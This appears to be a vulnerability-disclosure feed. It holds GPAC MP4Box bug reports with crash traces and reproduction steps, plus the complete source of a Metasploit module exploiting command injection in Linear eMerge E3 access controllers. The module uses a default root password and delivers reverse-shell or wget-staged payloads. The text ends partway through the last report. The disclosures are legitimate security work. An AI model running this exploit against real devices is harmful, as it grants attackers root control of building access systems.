GPAC MP4Box 2.1-DEV-rev649-ga8f438d20 has a segment fault (/stack overflow) due to infinite recursion in Media_GetSample isomedia/media.c:662

*   I looked for a similar issue and couldn't find any.
*   I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
*   I give enough information for contributors to reproduce my issue (meaningful title, github labels,

**Description**

segment fault (/stack overflow) due to infinite recursion in Media\_GetSample isomedia/media.c:662

**Version info**

latest version atm

    MP4Box - GPAC version 2.1-DEV-rev649-ga8f438d20-master
    (c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io
    
    Please cite our work in your research:
    	GPAC Filters: https://doi.org/10.1145/3339825.3394929
    	GPAC: https://doi.org/10.1145/1291233.1291452
    
    GPAC Configuration: --enable-sanitizer
    Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB  GPAC_DISABLE_3D
    

**Reproduce**

compile and run

    ./configure --enable-sanitizer
    make
    ./MP4Box import -cat poc_segfault2.mp4
    

Crash reported by sanitizer

    [HEVC] Error parsing NAL unit type 63
    Track Importing L-HEVC - Width 1 Height 6 FPS 25000/1000
    [HEVC] NAL Unit type 26 not handled - adding
    [HEVC] xPS changed but could not flush frames before signaling state change !
    [HEVC] Error parsing NAL unit type 33
    [HEVC] Error parsing NAL unit type 32
    [HEVC] Invalid log2_max_pic_order_cnt_lsb_minus4 80, max shall be 12
    [HEVC] Error parsing NAL unit type 33
    [HEVC] Error parsing Sequence Param Set
    [HEVC] Error parsing NAL unit type 34
    [HEVC] Error parsing NAL unit type 0
    [HEVC] Error parsing NAL unit type 32         
    [HEVC] Error parsing NAL unit type 32
    HEVC Import results: 7 samples (39 NALUs) - Slices: 0 I 0 P 1 B - 0 SEI - 0 IDR - 0 CRA
    HEVC L-HEVC Import results: Slices: 3 I 0 P 2 B
    HEVC Stream uses forward prediction - stream CTS offset: 6 frames
    HEVC Max NALU size is 106 - stream could be optimized by setting nal_length=1
    Appending file /home/sumuchuan/Desktop/gpac_fuzz/cat_gpac/bin/gcc/out/default/crashes/160.mp4
    No suitable destination track found - creating new one (type vide)
    AddressSanitizer:DEADLYSIGNAL   | (57/100)
    =================================================================
    ==738673==ERROR: AddressSanitizer: stack-overflow on address 0x7ffdae782bc0 (pc 0x7f415d384491 bp 0x7ffdae783400 sp 0x7ffdae782bc0 T0)
        #0 0x7f415d384491 in __sanitizer::StackTrace::StackTrace(unsigned long const*, unsigned int) ../../../../src/libsanitizer/sanitizer_common/sanitizer_stacktrace.h:52
        #1 0x7f415d384491 in __sanitizer::BufferedStackTrace::BufferedStackTrace() ../../../../src/libsanitizer/sanitizer_common/sanitizer_stacktrace.h:105
        #2 0x7f415d384491 in __interceptor_free ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:127
        #3 0x7f415787f858 in __GI__IO_free_backup_area libio/genops.c:190
        #4 0x7f415787cae3 in _IO_new_file_seekoff libio/fileops.c:975
        #5 0x7f415787ad52 in __fseeko libio/fseeko.c:40
        #6 0x7f4159a1536a in BS_SeekIntern utils/bitstream.c:1338
        #7 0x7f4159a1536a in gf_bs_seek utils/bitstream.c:1373
        #8 0x7f4159fbbfc9 in gf_isom_fdm_get_data isomedia/data_map.c:501
        #9 0x7f4159fbbfc9 in gf_isom_datamap_get_data isomedia/data_map.c:279
        #10 0x7f415a0a1f40 in Media_GetSample isomedia/media.c:641
        #11 0x7f4159ffc579 in gf_isom_get_sample_ex isomedia/isom_read.c:1916
        #12 0x7f4159ec91ca in gf_isom_nalu_sample_rewrite isomedia/avc_ext.c:454
        #13 0x7f415a0a305a in Media_GetSample isomedia/media.c:662
        #14 0x7f4159ffc579 in gf_isom_get_sample_ex isomedia/isom_read.c:1916
        #15 0x7f4159ec91ca in gf_isom_nalu_sample_rewrite isomedia/avc_ext.c:454
        #16 0x7f415a0a305a in Media_GetSample isomedia/media.c:662
        #17 0x7f4159ffc579 in gf_isom_get_sample_ex isomedia/isom_read.c:1916
        #18 0x7f4159ec91ca in gf_isom_nalu_sample_rewrite isomedia/avc_ext.c:454
        #19 0x7f415a0a305a in Media_GetSample isomedia/media.c:662
        #20 0x7f4159ffc579 in gf_isom_get_sample_ex isomedia/isom_read.c:1916
        #21 0x7f4159ec91ca in gf_isom_nalu_sample_rewrite isomedia/avc_ext.c:454
        #22 0x7f415a0a305a in Media_GetSample isomedia/media.c:662
        #23 0x7f4159ffc579 in gf_isom_get_sample_ex isomedia/isom_read.c:1916
        #24 0x7f4159ec91ca in gf_isom_nalu_sample_rewrite isomedia/avc_ext.c:454
        ...
    

looks like an infinite recursion

    Media_GetSample isomedia/media.c:662
     -> gf_isom_nalu_sample_rewrite isomedia/avc_ext.c:454
     -> gf_isom_get_sample_ex isomedia/isom_read.c:1916
     -> Media_GetSample isomedia/media.c:662
    

if compile without ASAN and run the same poc

    ./configure --static-bin
    make
    ./MP4Box import -cat poc_segfault2.mp4
    

there will be a segment fault

    [HEVC] Error parsing NAL unit type 63
    Track Importing L-HEVC - Width 1 Height 6 FPS 25000/1000
    [HEVC] NAL Unit type 26 not handled - adding
    [HEVC] xPS changed but could not flush frames before signaling state change !
    [HEVC] Error parsing NAL unit type 33
    [HEVC] Error parsing NAL unit type 32
    [HEVC] Invalid log2_max_pic_order_cnt_lsb_minus4 80, max shall be 12
    [HEVC] Error parsing NAL unit type 33
    [HEVC] Error parsing Sequence Param Set
    [HEVC] Error parsing NAL unit type 34
    [HEVC] Error parsing NAL unit type 0
    [HEVC] Error parsing NAL unit type 32         
    [HEVC] Error parsing NAL unit type 32
    HEVC Import results: 7 samples (39 NALUs) - Slices: 0 I 0 P 1 B - 0 SEI - 0 IDR - 0 CRA
    HEVC L-HEVC Import results: Slices: 3 I 0 P 2 B
    HEVC Stream uses forward prediction - stream CTS offset: 6 frames
    HEVC Max NALU size is 106 - stream could be optimized by setting nal_length=1
    Appending file /home/sumuchuan/Desktop/gpac_fuzz/cat_gpac/bin/gcc/out/default/crashes/160.mp4
    No suitable destination track found - creating new one (type vide)
    Segmentation fault=====         | (57/100)
    

Because it ran out of stack space, making rsp and rbp point to an unmapped memory, causing seg fault. backtrace atm

    pwndbg> bt
    ...
    #16487 0x000000000054d599 in gf_isom_get_sample_ex ()
    #16488 0x0000000000521d6d in gf_isom_nalu_sample_rewrite ()
    #16489 0x0000000000570e13 in Media_GetSample ()
    #16490 0x000000000054d599 in gf_isom_get_sample_ex ()
    #16491 0x0000000000521d6d in gf_isom_nalu_sample_rewrite ()
    #16492 0x0000000000570e13 in Media_GetSample ()
    #16493 0x000000000054d599 in gf_isom_get_sample_ex ()
    #16494 0x0000000000521d6d in gf_isom_nalu_sample_rewrite ()
    #16495 0x0000000000570e13 in Media_GetSample ()
    ...
    

**POC**

poc-segfault2.zip

**Impact**

Potentially causing DoS

**Credit**

Xdchase

CVE-2022-47662: Infinite recursion in Media_GetSample isomedia/media.c:662 · Issue #2359 · gpac/gpac

This Metasploit module exploits a command injection vulnerability in the Linear eMerge E3-Series Access Controller. The Linear eMerge E3 versions 1.00-06 and below are vulnerable to unauthenticated command injection in card_scan_decoder.php via the No and door HTTP GET parameter. Successful exploitation results in command execution as the root user.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##require 'rex/stopwatch'class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::CmdStager  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Linear eMerge E3-Series Access Controller Command Injection',        'Description' => %q{          This module exploits a command injection vulnerability in the Linear eMerge          E3-Series Access Controller. The Linear eMerge E3 versions `1.00-06` and below are vulnerable          to unauthenticated command injection in card_scan_decoder.php via the  `No` and `door` HTTP GET parameter.          Successful exploitation results in command execution as the `root` user.        },        'License' => MSF_LICENSE,        'Author' => [          'Gjoko Krstic <gjoko[at]applied-risk.com>', # Discovery          'h00die-gr3y <h00die.gr3y[at]gmail.com>' # MSF Module contributor        ],        'References' => [          [ 'CVE', '2019-7256'],          [ 'URL', 'https://applied-risk.com/resources/ar-2019-005' ],          [ 'URL', 'https://na.niceforyou.com/' ],          [ 'URL', 'https://attackerkb.com/topics/8WUJkci8N4/cve-2019-7256' ],          [ 'EDB', '47649'],          [ 'PACKETSTORM', '155256']        ],        'DisclosureDate' => '2019-10-29',        'Platform' => ['unix', 'linux'],        'Arch' => [ARCH_CMD, ARCH_ARMLE],        'Privileged' => true,        'Targets' => [          [            'Unix Command',            {              'Platform' => 'unix',              'Arch' => ARCH_CMD,              'Type' => :unix_cmd,              'DefaultOptions' => {                'PAYLOAD' => 'cmd/unix/reverse_bash'              }            }          ],          [            'Linux Dropper',            {              'Platform' => 'linux',              'Arch' => [ARCH_ARMLE],              'Type' => :linux_dropper,              'CmdStagerFlavor' => [ 'wget', 'printf', 'echo' ],              'DefaultOptions' => {                'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp'              }            }          ]        ],        'DefaultTarget' => 0,        'DefaultOptions' => {          'RPORT' => 80,          'SSL' => false        },        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]        }      )    )    register_options(      [        OptString.new('ROOT_PASSWORD', [ true, 'default root password on a vulnerable Linear eMerge E3-Series access controller', 'davestyle']),      ]    )  end  def execute_command(cmd, _opts = {})    random_no = rand(30..100)    return send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'card_scan_decoder.php'),      'vars_get' =>        {          'No' => random_no,          'door' => "`echo #{datastore['ROOT_PASSWORD']}|su -c \"#{cmd}\"`"        }    })  rescue StandardError => e    elog("#{peer} - Communication error occurred: #{e.message}", error: e)    fail_with(Failure::Unknown, "Communication error occurred: #{e.message}")  end  # Checking if the target is vulnerable by executing a randomized sleep to test the remote code execution  def check    print_status("Checking if #{peer} can be exploited.")    sleep_time = rand(2..10)    print_status("Performing command injection test issuing a sleep command of #{sleep_time} seconds.")    res, elapsed_time = Rex::Stopwatch.elapsed_time do      execute_command("sleep #{sleep_time}")    end    return CheckCode::Unknown('No response received from the target!') unless res    return CheckCode::Safe('Target is not affected by this vulnerability.') unless res.code == 200 && !res.body.blank? && res.body =~ /"card_format_default":"/    print_status("Elapsed time: #{elapsed_time.round(2)} seconds.")    return CheckCode::Safe('Command injection test failed.') unless elapsed_time >= sleep_time    CheckCode::Vulnerable('Successfully tested command injection.')  end  def exploit    case target['Type']    when :unix_cmd      print_status("Executing #{target.name} with #{payload.encoded}")      # Don't check the response here since the server won't respond      # if the payload is successfully executed.      execute_command(payload.encoded)    when :linux_dropper      print_status("Executing #{target.name}")      execute_cmdstager(linemax: 262144)    end  endend

Linear eMerge E3-Series Access Controller Command Injection

GPAC MP4box 2.1-DEV-rev574-g9d5bb184b is vulnerable to Buffer overflow in hevc_parse_vps_extension function of media_tools/av_parsers.c

Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you!

*   I looked for a similar issue and couldn't find any.
*   I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
*   I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop\_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95

Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/

**Description**

Buffer overflow in hevc\_parse\_vps\_extension function of media\_tools/av\_parsers.c

for (i = 0; i < (num\_scalability\_types - splitting\_flag); i++) {
  dimension\_id\_len\[i\] = 1 + gf\_bs\_read\_int\_log\_idx(bs, 3, "dimension\_id\_len\_minus1", i); // overflow at dimension\_id\_len
}

**Version info**

    MP4Box - GPAC version 2.1-DEV-rev574-g9d5bb184b-master
    (c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io
    
    Please cite our work in your research:
    	GPAC Filters: https://doi.org/10.1145/3339825.3394929
    	GPAC: https://doi.org/10.1145/1291233.1291452
    
    GPAC Configuration: --enable-sanitizer
    Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB  GPAC_DISABLE_3D
    

**Reproduce**

compile and run

    ./configure --enable-sanitizer
    make
    ./MP4Box import -add poc_bof6.mp4
    

Crash reported by sanitizer

    [Core] exp-golomb read failed, not enough bits in bitstream !
    [HEVC] Warning: Error parsing NAL unit
    media_tools/av_parsers.c:7633:19: runtime error: index 16 out of bounds for type 'u8 [16]'
    

**POC**

poc\_bof6.zip

**Impact**

Potentially causing DoS and RCE

**Credit**

Xdchase

CVE-2022-47095: Buffer overflow in hevc_parse_vps_extension function of media_tools/av_parsers.c · Issue #2346 · gpac/gpac

GPAC MP4box 2.1-DEV-rev574-g9d5bb184b is vulnerable to Buffer Overflow in gf_text_process_sub function of filters/load_text.c

Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you!

*   I looked for a similar issue and couldn't find any.
*   I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
*   I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop\_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95

Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/

**Description**

Buffer overflow in gf\_text\_process\_sub function of filters/load\_text.c

while (szLine\[i+1+j\] && szLine\[i+1+j\]!='}') {
	szTime\[i\] = szLine\[i+1+j\]; // overflow at szTime
	i++;
}

**Version info**

    MP4Box - GPAC version 2.1-DEV-rev574-g9d5bb184b-master
    (c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io
    
    Please cite our work in your research:
    	GPAC Filters: https://doi.org/10.1145/3339825.3394929
    	GPAC: https://doi.org/10.1145/1291233.1291452
    
    GPAC Configuration: --enable-sanitizer
    Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB  GPAC_DISABLE_3D
    

**Reproduce**

compile and run

    ./configure --enable-sanitizer
    make
    ./MP4Box import -add poc_bof5.avi
    

Crash reported by sanitizer

    Track Importing Timed Text - Text track 400 x 60 font Serif (size 18) layer 0
    [TXTIn] Bad SUB file - expecting "{" got "{"
    [TXTIn] corrupted SUB frame (line 2) - ends (at 0 ms) before start of current frame (6 ms) - skipping
    filters/load_text.c:2569:10: runtime error: index 20 out of bounds for type 'char [20]'
    

**POC**

poc\_bof5.zip

**Impact**

Potentially causing DoS and RCE

**Credit**

Xdchase

CVE-2022-47091: Buffer overflow in gf_text_process_sub function of filters/load_text.c · Issue #2343 · gpac/gpac

GPAC MP4box 2.1-DEV-rev574-g9d5bb184b is contains an Integer overflow vulnerability in gf_hevc_read_sps_bs_internal function of media_tools/av_parsers.c:8316

Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you!

Integer overflow in gf\_hevc\_read\_sps\_bs\_internal function of media\_tools/av\_parsers.c:8316

    MP4Box - GPAC version 2.1-DEV-rev574-g9d5bb184b-master
    (c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io
    
    Please cite our work in your research:
    	GPAC Filters: https://doi.org/10.1145/3339825.3394929
    	GPAC: https://doi.org/10.1145/1291233.1291452
    
    GPAC Configuration: --enable-sanitizer
    Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB  GPAC_DISABLE_3D
    

    ./configure --enable-sanitizer
    make
    ./MP4Box import -add poc_int.mov
    

    [Core] exp-golomb read failed, not enough bits in bitstream !
    [HEVC] Warning: Error parsing NAL unit
    media_tools/av_parsers.c:8316:25: runtime error: shift exponent 146 is too large for 32-bit type 'int'

CVE-2022-47092: Integer overflow in gf_hevc_read_sps_bs_internal function of media_tools/av_parsers.c:8316 · Issue #2347 · gpac/gpac

GPAC MP4box 2.1-DEV-rev574-g9d5bb184b is vulnerable to Buffer Overflow via gf_vvc_read_sps_bs_internal function of media_tools/av_parsers.c

Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you!

*   I looked for a similar issue and couldn't find any.
*   I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
*   I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop\_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95

Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/

**Description**

buffer overflow in gf\_vvc\_read\_sps\_bs\_internal function of media\_tools/av\_parsers.c

for (i=0; i<sps\_rpl1\_same\_as\_rpl0; i++) {
  u32 j;
  sps->num\_ref\_pic\_lists\[i\] = gf\_bs\_read\_ue\_log\_idx(bs, "sps\_num\_ref\_pic\_lists", i);
  for (j=0; j<sps->num\_ref\_pic\_lists\[i\]; j++) {
	  s32 res = vvc\_parse\_ref\_pic\_list\_struct(bs, sps, i, j, &sps->rps\[i\]\[j\]); // when j == 64, overflow sps->rps
	  if (res<0) return res;
  }
}

**Version info**

    MP4Box - GPAC version 2.1-DEV-rev574-g9d5bb184b-master
    (c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io
    
    Please cite our work in your research:
    	GPAC Filters: https://doi.org/10.1145/3339825.3394929
    	GPAC: https://doi.org/10.1145/1291233.1291452
    
    GPAC Configuration: --enable-sanitizer
    Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB  GPAC_DISABLE_3D
    

**Reproduce**

compile and run

    ./configure --enable-sanitizer
    make
    ./MP4Box import -add poc.mp4
    

Crash reported by sanitizer

    [VVC] Warning: Error parsing NAL unit
    [Core] exp-golomb read failed, not enough bits in bitstream !
    media_tools/av_parsers.c:10710:71: runtime error: index 65 out of bounds for type 'VVC_RefPicList [64]'
    

**POC**

poc\_bof.zip

**Impact**

Potentially causing DoS and RCE

**Credit**

xdchase

CVE-2022-47089: Buffer overflow in gf_vvc_read_sps_bs_internal function of media_tools/av_parsers.c · Issue #2338 · gpac/gpac

GPAC MP4box 2.1-DEV-rev574-g9d5bb184b has a Buffer overflow in gf_vvc_read_pps_bs_internal function of media_tools/av_parsers.c

Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you!

*   I looked for a similar issue and couldn't find any.
*   I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
*   I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop\_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95

Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/

**Description**

buffer overflow in gf\_vvc\_read\_pps\_bs\_internal function of media\_tools/av\_parsers.c

while (nb\_ctb\_left >= uni\_size\_ctb) {
	nb\_ctb\_left -= uni\_size\_ctb;
	pps->tile\_rows\_height\_ctb\[pps->num\_tile\_rows\] = uni\_size\_ctb; // when pps->num\_tile\_rows == 32, overflow at pps->tile\_rows\_height\_ctb
	pps->num\_tile\_rows++;
}

**Version info**

    MP4Box - GPAC version 2.1-DEV-rev574-g9d5bb184b-master
    (c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io
    
    Please cite our work in your research:
    	GPAC Filters: https://doi.org/10.1145/3339825.3394929
    	GPAC: https://doi.org/10.1145/1291233.1291452
    
    GPAC Configuration: --enable-sanitizer
    Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB  GPAC_DISABLE_3D
    

**Reproduce**

compile and run

    ./configure --enable-sanitizer
    make
    ./MP4Box import -add poc_bof2.mp4
    

Crash reported by sanitizer

    [Core] exp-golomb read failed, not enough bits in bitstream !
    [VVC] Warning: Error parsing NAL unit
    media_tools/av_parsers.c:10985:29: runtime error: index 33 out of bounds for type 'u32 [33]'
    

**POC**

poc\_bof2.zip

**Impact**

Potentially causing DoS and RCE

**Credit**

Xdchase

CVE-2022-47087: Buffer overflow in gf_vvc_read_pps_bs_internal function of media_tools/av_parsers.c · Issue #2339 · gpac/gpac

GPAC version 2.1-DEV-rev505-gb9577e6ad-master was discovered to contain a memory leak via the afrt_box_read function at box_code_adobe.c.

A memory leak has occurred when running program MP4Box, this can reproduce on the lattest commit.

**Version**

    $ ./MP4Box -version                              
    MP4Box - GPAC version 2.1-DEV-rev505-gb9577e6ad-master
    (c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io
    
    Please cite our work in your research:
    	GPAC Filters: https://doi.org/10.1145/3339825.3394929
    	GPAC: https://doi.org/10.1145/1291233.1291452
    
    GPAC Configuration: --static-build --extra-cflags=-fsanitize=address -g --extra-ldflags=-fsanitize=address -g
    Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_FREETYPE GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_HAS_LINUX_DVB
    

git log

    commit b9577e6ad91ef96decbcd369227ab02b2842c77f (HEAD -> master, origin/master, origin/HEAD)
    Author: jeanlf <jeanlf@gpac.io>
    Date:   Fri Nov 25 16:53:55 2022 +0100
    

**Verification steps**

    export CFLAGS='-fsanitize=address -g'
    export CC=/usr/bin/clang
    export CXX=/usr/bin/clang++ 
    git clone https://github.com/gpac/gpac.git
    cd gpac
    ./configure --static-build --extra-cflags="${CFLAGS}" --extra-ldflags="${CFLAGS}"
    make
    cd bin/gcc
    ./MP4Box -info $poc
    

**POC file**

https://github.com/HotSpurzzZ/testcases/blob/main/gpac/gpac\_Direct\_leak\_afrt\_box\_read.mp4

**AddressSanitizer output**

    $ ./MP4Box -info gpac_Direct_leak_afrt_box_read.mp4       
    [isom] not enough bytes in box afrt: 0 left, reading 1 (file isomedia/box_code_adobe.c, line 713)
    [iso file] Read Box "afrt" (start 0) failed (Invalid IsoMedia File) - skipping
    Error opening file gpac_Direct_leak_afrt_box_read.mp4: Invalid IsoMedia File
    
    =================================================================
    ==10525==ERROR: LeakSanitizer: detected memory leaks
    
    Direct leak of 24 byte(s) in 1 object(s) allocated from:
        #0 0x4a186d in malloc (/root/Desktop/gpac/bin/gcc/MP4Box+0x4a186d)
        #1 0x902c18 in afrt_box_read /root/Desktop/gpac/src/isomedia/box_code_adobe.c:706:35
    
    SUMMARY: AddressSanitizer: 24 byte(s) leaked in 1 allocation(s).

CVE-2022-46490: Memory leak in afrt_box_read function of box_code_adobe.c:706:35 · Issue #2327 · gpac/gpac

GPAC MP4box 2.1-DEV-rev574-g9d5bb184b is vulnerable to Null pointer dereference via filters/dmx_m2ts.c:343 in m2tsdmx_declare_pid

Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you!

*   I looked for a similar issue and couldn't find any.
*   I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
*   I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop\_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95

Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/

**Description**

Null pointer dereference filters/dmx\_m2ts.c:343 in m2tsdmx\_declare\_pid

**Version info**

    MP4Box - GPAC version 2.1-DEV-rev574-g9d5bb184b-master
    (c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io
    
    Please cite our work in your research:
    	GPAC Filters: https://doi.org/10.1145/3339825.3394929
    	GPAC: https://doi.org/10.1145/1291233.1291452
    
    GPAC Configuration: --enable-sanitizer
    Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB  GPAC_DISABLE_3D
    

**Reproduce**

compile and run

    ./configure --enable-sanitizer
    make
    ./MP4Box import -add poc_nderef.avi
    

**Crash reported by sanitizer**

    Broken PAT found reserved PID 0, ignoring
    Broken PAT found reserved PID 0, ignoring
    Broken PAT found reserved PID 0, ignoring
    Broken PAT found reserved PID 0, ignoring
    Broken PMT descriptor! size 54, desc size 48 but position 5
    MORE sections on pid 4144
    Broken PMT descriptor! size 54, desc size 48 but position 10
    Broken PMT descriptor! size 54, desc size 48 but position 15
    [MPEG-2 TS] PID 4144 reused across programs 8192 and 8192, not completely supported
    Broken PMT descriptor! size 54, desc size 48 but position 20
    [MPEG-2 TS] PID 4144 reused across programs 8192 and 8192, not completely supported
    MORE sections on pid 4144
    [MPEG-2 TS] PID 4144 reused across programs 8192 and 8192, not completely supported
    [MPEG-2 TS] Invalid PMT es descriptor size for PID 5859
    [MPEG-2 TS] TS Packet 3 is scrambled - not supported
    Broken PAT found reserved PID 0, ignoring
    Broken PAT found reserved PID 0, ignoring
    Broken PAT found reserved PID 0, ignoring
    Broken PAT found reserved PID 0, ignoring
    Broken PMT descriptor! size 54, desc size 48 but position 5
    MORE sections on pid 4144
    Broken PMT descriptor! size 54, desc size 48 but position 10
    Broken PMT descriptor! size 54, desc size 48 but position 15
    [MPEG-2 TS] PID 4144 reused across programs 8192 and 8192, not completely supported
    Broken PMT descriptor! size 54, desc size 48 but position 20
    [MPEG-2 TS] PID 4144 reused across programs 8192 and 8192, not completely supported
    MORE sections on pid 4144
    [MPEG-2 TS] PID 4144 reused across programs 8192 and 8192, not completely supported
    [MPEG-2 TS] Invalid PMT es descriptor size for PID 5859
    [M2TSDmx] Stream type 0x30 not supported - ignoring pid
    filters/dmx_m2ts.c:343:51: runtime error: member access within null pointer of type 'struct GF_InitialObjectDescriptor'
    

**POC**

poc\_nderef.zip

**Impact**

Potentially causing DoS and RCE

**Credit**

Xdchase

CVE-2022-47094: Null pointer dereference filters/dmx_m2ts.c:343 in m2tsdmx_declare_pid · Issue #2345 · gpac/gpac

GPAC version 2.1-DEV-rev505-gb9577e6ad-master was discovered to contain a memory leak via the gf_isom_box_parse_ex function at box_funcs.c.

A memory leak has occurred when running program MP4Box, this can reproduce on the lattest commit.

**Version**

    $ ./MP4Box -version                              
    MP4Box - GPAC version 2.1-DEV-rev505-gb9577e6ad-master
    (c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io
    
    Please cite our work in your research:
    	GPAC Filters: https://doi.org/10.1145/3339825.3394929
    	GPAC: https://doi.org/10.1145/1291233.1291452
    
    GPAC Configuration: --static-build --extra-cflags=-fsanitize=address -g --extra-ldflags=-fsanitize=address -g
    Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_FREETYPE GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_HAS_LINUX_DVB
    

git log

    commit b9577e6ad91ef96decbcd369227ab02b2842c77f (HEAD -> master, origin/master, origin/HEAD)
    Author: jeanlf <jeanlf@gpac.io>
    Date:   Fri Nov 25 16:53:55 2022 +0100
    

**Verification steps**

    export CFLAGS='-fsanitize=address -g'
    export CC=/usr/bin/clang
    export CXX=/usr/bin/clang++ 
    git clone https://github.com/gpac/gpac.git
    cd gpac
    ./configure --static-build --extra-cflags="${CFLAGS}" --extra-ldflags="${CFLAGS}"
    make
    cd bin/gcc
    ./MP4Box -info $poc
    

**POC file**

https://github.com/HotSpurzzZ/testcases/blob/main/gpac/gpac\_Direct\_leak\_gf\_isom\_box\_parse\_ex.mp4

**AddressSanitizer output**

    $ ./MP4Box -info gpac_Direct_leak_gf_isom_box_parse_ex.mp4
    [iso file] Failed to uncompress payload for box type !ssx (0x21737378)
    Error opening file gpac_Direct_leak_gf_isom_box_parse_ex.mp4: BitStream Not Compliant
    
    =================================================================
    ==10575==ERROR: LeakSanitizer: detected memory leaks
    
    Direct leak of 1718840668 byte(s) in 1 object(s) allocated from:
        #0 0x4a186d in malloc (/root/Desktop/gpac/bin/gcc/MP4Box+0x4a186d)
        #1 0x7dfc41 in gf_isom_box_parse_ex /root/Desktop/gpac/src/isomedia/box_funcs.c:166:13
        #2 0x7df29c in gf_isom_parse_root_box /root/Desktop/gpac/src/isomedia/box_funcs.c:38:8
    
    Direct leak of 4096 byte(s) in 1 object(s) allocated from:
        #0 0x4a186d in malloc (/root/Desktop/gpac/bin/gcc/MP4Box+0x4a186d)
